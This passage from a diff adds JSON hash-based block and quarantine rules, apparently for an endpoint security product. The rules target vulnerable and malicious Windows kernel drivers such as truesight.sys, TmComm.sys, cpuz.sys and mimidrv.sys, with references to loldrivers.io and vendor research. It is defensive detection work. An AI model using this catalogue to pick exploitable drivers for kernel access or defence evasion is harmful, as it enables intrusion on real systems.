+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827897Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "218a7f2c0c645745a0f8b6df1ff52d61febe127cd7a33d7f163dda98d133745f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4174591-f45d-59c9-8292-78188af15801",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828685Z",
+ "creation_date": "2026-03-23T11:45:30.828687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a3642c31fafc524b24c8ac692913df6ce0548efeca06fb369dc10bb9a95949d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b41e7709-111d-5c2f-81d5-5d5736f616a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973501Z",
+ "creation_date": "2026-03-23T11:45:29.973503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c1251784e6f61525d0082882a969cb8a0c5d5359be22f5a73e3b0cd38b51687",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b431e3fb-ee12-5c58-afd1-0fac1005d337",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473748Z",
+ "creation_date": "2026-03-23T11:45:30.473751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f7c6346a25d465fbc06c41d841e6a5c7645545448db88793ab29d8e5637fae5",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b437c67d-c183-561c-9f08-ec70d8be090c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826350Z",
+ "creation_date": "2026-03-23T11:45:31.826352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed24e54cc6b6954987ba052764ed936ce6cc6644b05ad909b1378142e7c1090d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b44d9faa-4eae-5294-8e2c-3004d0c8609e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142928Z",
+ "creation_date": "2026-03-23T11:45:31.142930Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa5badc3f69d4d48396dc76bf4ae78def57fbda2d459d9365db64da6963bb2e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b476bf47-5860-557e-9669-282d388d7a90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479437Z",
+ "creation_date": "2026-03-23T11:45:31.479442Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a96d43d06fe7e9ddaf6206965b66611d24bb77341a9f0ec29ae9914bf486e8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b48976aa-b9f2-5c04-ba88-d780c7e7ddd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479618Z",
+ "creation_date": "2026-03-23T11:45:30.479620Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479626Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bed4285d0f8d18f17ddaa53a98a475c87c04c4d167499e24c770da788e5d45f4",
+ "comment": "Malicious Kernel Driver (aka be6318413160e589080df02bb3ca6e6a.sys) [https://www.loldrivers.io/drivers/a9ab4412-d484-459b-be97-5975f5ab8094/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4b64ef1-69c0-5715-b9ee-dab23b1ae135",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973287Z",
+ "creation_date": "2026-03-23T11:45:29.973289Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "262268f21c789c2bdaf1950b556456a9a5114ed5759d806200b0cec107bf76d7",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4b6f415-60cd-5915-9949-b839668e1aeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967494Z",
+ "creation_date": "2026-03-23T11:45:29.967496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb8e536680732b474a5c26970ace2087667622caa3dd82c1c56731a7c5a1c8ce",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4c5a55a-a4c8-5d40-8630-7540768cbf1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150721Z",
+ "creation_date": "2026-03-23T11:45:31.150723Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150729Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0dd599393c689718f83fc63b98cf42bc62ea27cbd5c9993e845019464e9cc20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4d7d834-ba5b-56b4-886b-2891dbb37384",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810219Z",
+ "creation_date": "2026-03-23T11:45:31.810221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf3a7dee3a5dcbc237cc2015a0e23a97306f914e502e98d9fcb45af3ddbdef64",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4de0662-096d-59f6-a3c2-1035309217ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459300Z",
+ "creation_date": "2026-03-23T11:45:30.459303Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459312Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dbc2a37f53507296cc912e7d354dab4e55541ba821561aa84f74d1bd8346be2",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b4fe044a-e17d-514e-a60b-908a72a16f8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621938Z",
+ "creation_date": "2026-03-23T11:45:29.621947Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54231728c29f2d2003ec575729760369bb72be7b656b52b4f02ec198f4ee4dfd",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b504f00d-92f0-5356-9d5b-a684baec31ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832242Z",
+ "creation_date": "2026-03-23T11:45:30.832245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78cb9665367af9bb8e1c49ce7c64fc56f2c9580c4781a2d09bbceaa23f9f130b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5244573-846b-5ca5-ad22-5ab9340253bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495653Z",
+ "creation_date": "2026-03-23T11:45:31.495655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "034eb20c8e0409eee548de31e50388ade722fcb2137314d0bbee8e5d5cb0339e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b52d12a0-e5f8-5a1b-99ca-cb2a154bfa94",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463013Z",
+ "creation_date": "2026-03-23T11:45:30.463016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94ba4bcbdb55d6faf9f33642d0072109510f5c57e8c963d1a3eb4f9111f30112",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b538652b-7c06-56b3-b096-4a34dc9678c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817933Z",
+ "creation_date": "2026-03-23T11:45:30.817935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817941Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "70afdc0e11db840d5367afe53c35d9642c1cf616c7832ab283781d085988e505",
+ "comment": "Vulnerable Kernel Driver (aka stdcdrvws64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b54b7cd4-1b8a-52ae-ac14-fde3a4e528dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980855Z",
+ "creation_date": "2026-03-23T11:45:29.980857Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0e583bd88eb198558442f69a8bbfc96f4c5c297befea295138cfd2070f745c5",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b54f9446-26de-56b2-bafb-b8577d4be1ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151038Z",
+ "creation_date": "2026-03-23T11:45:31.151040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f56ccd1a839000a76a839ed9f03ff5778951890eb1fe13c5fcdb2540ed558ae3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b55286d1-6392-5956-921a-2091f976c8a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980447Z",
+ "creation_date": "2026-03-23T11:45:29.980449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b547368c03e0a584ae3c5e62af3728426c68b316a15f3290316844d193ad182",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b553a1f9-0ece-5f38-ab3d-d3e8e62fe043",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155014Z",
+ "creation_date": "2026-03-23T11:45:31.155016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155021Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a19128fb0894e5f0f70e24b651007d33a51d430b1ff8ee77cdcb17b925ce95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5612782-d39b-59c1-98bb-ba9bb525c065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828988Z",
+ "creation_date": "2026-03-23T11:45:31.828991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828998Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e753d1cc0ee358578b604144b918f287f1127da9cebfdbf167ee649d7534fda",
